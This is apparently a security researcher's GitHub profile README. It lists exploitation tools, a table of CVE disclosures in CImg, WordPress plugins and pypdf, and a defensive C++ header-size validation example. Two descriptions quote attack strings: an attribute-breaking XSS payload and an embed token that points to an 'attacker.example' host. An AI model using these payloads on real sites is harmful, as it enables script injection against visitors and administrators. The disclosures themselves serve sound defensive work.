manop55555/README.md

manop55555

maybe 0 or 1

Tools & Languages

Skills

ARM Assembly, Binary Ninja, checksec, GDB, GDB-PEDA, Ghidra, IDA Pro, ltrace, Metasploit, NASM, objdump, one_gadget, pwndbg, pwntools, Radare2, readelf, ROPgadget, Ropper, strace, strings, x86 Assembly, x86-64 Assembly

CVE Disclosures

| CVE ID | Description | Severity |
| --- | --- | --- |
| CVE-2026-47667 | CImg (<= 3.7.6). The _load_analyze() function reads the header_size field as an unsigned 32-bit integer from the first 4 bytes of a NIfTI/Analyze file and passes it directly to new unsigned char[header_size] without validating against the actual file size. A specially crafted file of only 6 bytes is enough to trigger an allocation of approximately 1.3 GB per call, and when the subsequent read fails the allocated buffer is never freed. An attacker who can feed an untrusted image file to an application using CImg can cause repeated memory exhaustion and denial of service. | High |
| CVE-2026-9104 | WordPress Plugin Draft List (<= 2.6.3). When a site configures the [drafts] shortcode or Draft List widget with a custom template placing the {{draft}} placeholder inside an HTML attribute, the plugin substitutes the raw draft post title without escaping for viewers who lack edit permissions. A user with Contributor role can save a draft whose title contains a quote-only payload such as x" onerror="alert(1), which breaks out of the surrounding attribute and executes arbitrary JavaScript in any visitor browsing the public page. | Moderate |
| CVE-2026-48093 | WordPress Plugin Code Embed (<= 2.6). The plugin scans rendered post content for external URL embed tokens such as {{https://attacker.example/payload.html}}, performs a server-side HTTP request to the URL, and inserts the response body into the page without sanitization or an unfiltered_html capability check. A user with Contributor role can submit a pending post containing such a token pointing to an attacker-controlled host, and when an Administrator or Editor previews the post the returned HTML executes arbitrary JavaScript in the reviewer browser session. | Moderate |
| CVE-2026-48735 | pypdf (< 6.12.1). The XMP metadata parser does not impose any size or complexity limits on the metadata stream embedded in a PDF document. An attacker who can supply an untrusted PDF to an application using pypdf can craft a document containing very large XMP metadata, often padded with large numbers of unnecessary elements, causing pypdf to consume excessive memory while parsing and exhaust the available RAM, resulting in denial of service. | Moderate |
| CVE-2025-10181 | WordPress Plugin Draft List (<= 2.6). The plugin drafts shortcode does not sufficiently sanitize and escape user-supplied attributes before rendering them on the page. A user with Contributor role or higher can inject arbitrary web scripts through these attributes, and the injected payload is stored and executed every time another user visits a page containing the affected shortcode. | Moderate |
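
The first entry describes an allocation sized by an unvalidated length field. The sketch below is an added example (not CImg's code and not this profile author's) of the defensive pattern: compare the declared size with the real file size before allocating, and let a container own the buffer so a failed read cannot leak it. The function names, the 1 MiB cap and the sample inputs are assumptions made for illustration.

```cpp
// Added example, not CImg source; all names here are hypothetical.
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <vector>

// Assumed policy ceiling for a header; tune to the formats you accept.
constexpr std::uint32_t kMaxHeaderSize = 1u << 20;

// Reads a header whose first 4 bytes declare its own size (native byte order).
// Returns false, allocating nothing, when the file cannot hold that size.
bool read_sized_header(std::FILE *f, std::vector<unsigned char> &out) {
    if (!f || std::fseek(f, 0, SEEK_END) != 0) return false;
    const long file_size = std::ftell(f);
    if (file_size < 4 || std::fseek(f, 0, SEEK_SET) != 0) return false;

    std::uint32_t header_size = 0;
    if (std::fread(&header_size, 1, 4, f) != 4) return false;

    // Validate the untrusted length against the real file size before allocating.
    if (header_size < 4 || header_size > kMaxHeaderSize ||
        header_size > static_cast<std::uint64_t>(file_size))
        return false;

    std::vector<unsigned char> header(header_size);  // RAII: released on every path
    std::memcpy(header.data(), &header_size, 4);
    const std::size_t rest = header_size - 4;
    if (std::fread(header.data() + 4, 1, rest, f) != rest) return false;
    out.swap(header);
    return true;
}

// Writes constructed bytes to a temp file and reports whether they parse.
bool accepts(std::uint32_t declared_size, std::size_t actual_size) {
    std::vector<unsigned char> bytes(actual_size, 0);
    if (actual_size >= 4) std::memcpy(bytes.data(), &declared_size, 4);
    std::FILE *f = std::tmpfile();
    if (!f) return false;
    std::fwrite(bytes.data(), 1, bytes.size(), f);
    std::vector<unsigned char> header;
    const bool ok = read_sized_header(f, header) && header.size() == declared_size;
    std::fclose(f);
    return ok;
}

int main() {  // constructed inputs: a 6-byte file with a huge length, then a consistent one
    std::printf("6-byte file, huge declared size: %d\n", accepts(0x50000000u, 6));
    std::printf("348-byte file, declared 348:     %d\n", accepts(348, 348));
    return 0;
}
```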

Popular repositories

  1. manop55555 Public

  2. abcpwn Public

    Native C++20 CLI toolkit for binary exploitation.

    C++